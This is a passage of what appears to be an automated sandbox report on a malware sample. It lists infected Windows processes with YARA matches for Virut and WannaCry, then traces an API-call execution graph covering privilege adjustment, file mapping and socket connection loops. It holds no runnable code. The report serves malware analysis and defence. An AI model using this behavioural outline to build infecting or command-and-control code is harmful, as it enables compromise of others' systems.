                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.293535690.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.780713316.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.299868171.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.299802477.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.780873967.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:18
                                                                                                                                              Start time:01:44:33
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:19
                                                                                                                                              Start time:01:44:33
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:20
                                                                                                                                              Start time:01:44:34
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:21
                                                                                                                                              Start time:01:44:35
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:22
                                                                                                                                              Start time:01:44:35
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.300112892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.304308861.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.304252619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.780935502.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.780728643.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:23
                                                                                                                                              Start time:01:44:35
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                              Imagebase:0x7ff78e9b0000
                                                                                                                                              File size:163336 bytes
                                                                                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:24
                                                                                                                                              Start time:01:44:36
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:25
                                                                                                                                              Start time:01:44:37
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:fontdrvhost.exe
                                                                                                                                              Imagebase:0x7ff7d9820000
                                                                                                                                              File size:790304 bytes
                                                                                                                                              MD5 hash:31113981180E69C2773BCADA4051738A
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.780744120.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.306044104.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.305864286.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.780921398.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.302993450.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:26
                                                                                                                                              Start time:01:44:38
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\dwm.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:dwm.exe
                                                                                                                                              Imagebase:0x7ff729570000
                                                                                                                                              File size:62464 bytes
                                                                                                                                              MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.305699245.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.780744420.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.308100233.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.308123109.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.780927237.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:27
                                                                                                                                              Start time:01:44:40
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                              Imagebase:0x7ff638ba0000
                                                                                                                                              File size:19352 bytes
                                                                                                                                              MD5 hash:B7FC4A29431D4F795BBAB1FB182B759A
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:28
                                                                                                                                              Start time:01:44:44
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:29
                                                                                                                                              Start time:01:44:46
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:30
                                                                                                                                              Start time:01:44:52
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              General

                                                                                                                                              Target ID:31
                                                                                                                                              Start time:01:44:55
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\tasksche.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\WINDOWS\tasksche.exe /i
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:3514368 bytes
                                                                                                                                              MD5 hash:3233ACED9279EF54267C479BBA665B90
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000001F.00000000.342404801.000000000040E000.00000008.00000001.01000000.00000007.sdmp, Author: us-cert code analysis team
                                                                                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                                                                                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                                                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              • Detection: 85%, Metadefender, Browse
                                                                                                                                              • Detection: 95%, ReversingLabs

                                                                                                                                              General

                                                                                                                                              Target ID:32
                                                                                                                                              Start time:01:44:59
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000000.351839583.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000002.780747670.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:33
                                                                                                                                              Start time:01:45:01
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000000.354298451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000002.780747070.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:34
                                                                                                                                              Start time:01:45:05
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000002.780744908.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000000.364362533.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:35
                                                                                                                                              Start time:01:45:08
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.780747324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000000.370652904.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:36
                                                                                                                                              Start time:01:45:12
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000002.780745901.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000000.379109291.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:37
                                                                                                                                              Start time:01:45:14
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:false
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.780746234.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000000.382043124.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:38
                                                                                                                                              Start time:01:45:15
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000000.385443312.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.780755770.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:39
                                                                                                                                              Start time:01:45:17
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000002.780822412.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000000.388511778.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              General

                                                                                                                                              Target ID:40
                                                                                                                                              Start time:01:45:24
                                                                                                                                              Start date:23/07/2022
                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s EventSystem
                                                                                                                                              Imagebase:0x7ff73c930000
                                                                                                                                              File size:51288 bytes
                                                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:false
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000002.780830688.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000000.404533408.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                              Disassembly

                                                                                                                                              Reset < >

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:4.1%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:62.2%
                                                                                                                                                Total number of Nodes:699
                                                                                                                                                Total number of Limit Nodes:11
                                                                                                                                                execution_graph 6347 7fea4c6b 6350 7fea4c9e 6347->6350 6351 7fea4caa 6350->6351 6358 7fea4499 6351->6358 6353 7fea4cb7 6354 7fea4499 5 API calls 6353->6354 6357 7fea4d64 6353->6357 6355 7fea4d58 6354->6355 6356 7fea4499 5 API calls 6355->6356 6355->6357 6356->6357 6359 7fea44a3 GetFileAttributesA 6358->6359 6361 7fea44c2 CreateFileA 6358->6361 6360 7fea44af SetFileAttributesA 6359->6360 6359->6361 6360->6361 6363 7fea44fc CreateFileMappingA 6361->6363 6365 7fea4573 MapViewOfFile 6363->6365 6367 7fea45a8 6365->6367 6367->6353 6704 ac662d 6707 ac6647 6704->6707 6708 ac6637 6707->6708 6709 ac6652 6707->6709 6711 ac6658 6709->6711 6712 ac2574 5 API calls 6711->6712 6713 ac666a 6712->6713 6713->6708 7137 ac116f LoadLibraryA 7140 ac1196 GetProcAddress 7137->7140 7139 ac1180 7140->7139 6542 7fea43ad 6543 7fea43b9 6542->6543 6546 7fea43dd 6543->6546 6545 7fea43c4 6549 7fea144a LookupPrivilegeValueA NtAdjustPrivilegesToken 6546->6549 6548 7fea43e3 6548->6545 6549->6548 7145 ac2665 7147 ac266b CreateThread CloseHandle 7145->7147 7148 ac3c38 7147->7148 7150 ac3c3d 7148->7150 7151 ac3ca9 7150->7151 7156 ac3c5b GetWindowsDirectoryA 7150->7156 7205 ac252f NtOpenSection 7151->7205 7153 ac3cae 7154 ac3cfb GetSystemDirectoryA 7153->7154 7155 ac3cb5 7153->7155 7250 ac3d1f lstrcat 7154->7250 7206 ac3cc2 GetModuleHandleA 7155->7206 7160 ac3d26 7156->7160 7292 ac3d36 LoadLibraryA 7160->7292 7205->7153 7207 ac3ccc 7206->7207 7208 ac3cde 7206->7208 7210 ac3cd4 GetProcAddress 7207->7210 7333 ac3cf0 GetModuleHandleA 7208->7333 7210->7208 7251 ac3d26 7250->7251 7252 ac3d36 151 API calls 7251->7252 7253 ac3d2b GetProcAddress LoadLibraryA 7252->7253 7255 ac10ce 2 API calls 7253->7255 7256 ac3d7d 7255->7256 7257 ac3d92 GetTickCount 7256->7257 7258 ac3daa 7257->7258 7259 ac3e47 GetVolumeInformationA 7258->7259 7260 ac3e7a 7259->7260 7261 ac3f25 7260->7261 7262 ac3eb5 96 API calls 7260->7262 7264 ac3f4f 7261->7264 7265 ac3f31 CreateThread CloseHandle 7261->7265 7263 ac3ea9 7262->7263 7263->7261 7266 ac3f14 7263->7266 7268 ac3eca GetModuleFileNameA wsprintfA 7263->7268 7267 ac3f60 43 API calls 7264->7267 7265->7264 7266->7261 7270 ac3405 5 API calls 7266->7270 7269 ac3f54 7267->7269 7268->7266 7271 ac10ce 2 API calls 7269->7271 7270->7261 7272 ac3f7e 7271->7272 7273 ac3f8f 23 API calls 7272->7273 7274 ac3f83 7273->7274 7275 ac3ffa CreateEventA 7274->7275 7276 ac3fd3 CreateThread CloseHandle 7274->7276 7289 ac4012 7275->7289 7276->7275 7277 ac4065 gethostbyname 7277->7289 7278 ac4056 lstrlen 7278->7277 7278->7278 7279 ac4081 socket 7282 ac40a6 connect 7279->7282 7279->7289 7280 ac4320 RtlExitUserThread 7281 ac42d0 SetEvent 7281->7289 7283 ac42b7 closesocket 7282->7283 7282->7289 7283->7289 7284 ac42f2 Sleep ResetEvent 7284->7289 7285 ac40ef GetVersionExA 7285->7289 7286 ac4172 wsprintfA 7286->7289 7287 ac41a7 CreateThread CloseHandle 7287->7289 7288 ac41f6 GetTickCount 7288->7289 7289->7277 7289->7278 7289->7279 7289->7280 7289->7281 7289->7283 7289->7284 7289->7285 7289->7286 7289->7287 7289->7288 7290 ac4288 Sleep 7289->7290 7290->7289 7291 ac4294 GetTickCount 7290->7291 7291->7289 7490 ac3d4b GetProcAddress LoadLibraryA 7292->7490 7376 ac26d4 7333->7376 7336 ac3d1f 179 API calls 7337 ac3d12 GetProcAddress LoadLibraryA 7336->7337 7339 ac10ce 2 API calls 7337->7339 7340 ac3d7d 7339->7340 7341 ac3d92 GetTickCount 7340->7341 7342 ac3daa 7341->7342 7343 ac3e47 GetVolumeInformationA 7342->7343 7344 ac3e7a 7343->7344 7345 ac3f25 7344->7345 7378 ac3eb5 LoadLibraryA 7344->7378 7348 ac3f4f 7345->7348 7349 ac3f31 CreateThread CloseHandle 7345->7349 7410 ac3f60 LoadLibraryA 7348->7410 7349->7348 7377 ac26c8 GetSystemDirectoryA 7376->7377 7377->7336 7432 ac3ecc GetProcAddress GetModuleFileNameA wsprintfA 7378->7432 7411 ac3f7e 7410->7411 7412 ac10ce 2 API calls 7410->7412 7413 ac3f8f 23 API calls 7411->7413 7412->7411 7414 ac3f83 7413->7414 7415 ac3ffa CreateEventA 7414->7415 7416 ac3fd3 CreateThread CloseHandle 7414->7416 7429 ac4012 7415->7429 7416->7415 7417 ac4065 gethostbyname 7417->7429 7418 ac4056 lstrlen 7418->7417 7418->7418 7419 ac4081 socket 7422 ac40a6 connect 7419->7422 7419->7429 7420 ac4320 RtlExitUserThread 7421 ac42d0 SetEvent 7421->7429 7423 ac42b7 closesocket 7422->7423 7422->7429 7423->7429 7424 ac42f2 Sleep ResetEvent 7424->7429 7425 ac40ef GetVersionExA 7425->7429 7426 ac4172 wsprintfA 7426->7429 7427 ac41a7 CreateThread CloseHandle 7427->7429 7428 ac41f6 GetTickCount 7428->7429 7429->7417 7429->7418 7429->7419 7429->7420 7429->7421 7429->7423 7429->7424 7429->7425 7429->7426 7429->7427 7429->7428 7430 ac4288 Sleep 7429->7430 7430->7429 7431 ac4294 GetTickCount 7430->7431 7431->7429 7433 ac3f14 7432->7433 7434 ac3f25 7433->7434 7461 ac3405 7433->7461 7436 ac3f4f 7434->7436 7437 ac3f31 CreateThread CloseHandle 7434->7437 7438 ac3f60 43 API calls 7436->7438 7437->7436 7439 ac3f54 7438->7439 7440 ac10ce 2 API calls 7439->7440 7441 ac3f7e 7440->7441 7469 ac3f8f LoadLibraryA 7441->7469 7462 ac343b 7461->7462 7462->7462 7463 ac3440 NtOpenSection 7462->7463 7464 ac345f NtQuerySystemInformation 7463->7464 7468 ac35f3 7463->7468 7465 ac346f MapViewOfFile CloseHandle 7464->7465 7467 ac34b0 7465->7467 7465->7468 7466 ac34b7 UnmapViewOfFile 7466->7468 7467->7466 7467->7468 7468->7434 7470 ac3f9d 7469->7470 7471 ac4320 RtlExitUserThread 7469->7471 7472 ac10ce 2 API calls 7470->7472 7473 ac3fb5 7472->7473 7473->7471 7474 ac3fc2 WSAStartup CreateThread CloseHandle 7473->7474 7475 ac3ffa CreateEventA 7474->7475 7487 ac4012 7475->7487 7476 ac4065 gethostbyname 7476->7487 7477 ac4056 lstrlen 7477->7476 7477->7477 7478 ac4081 socket 7480 ac40a6 connect 7478->7480 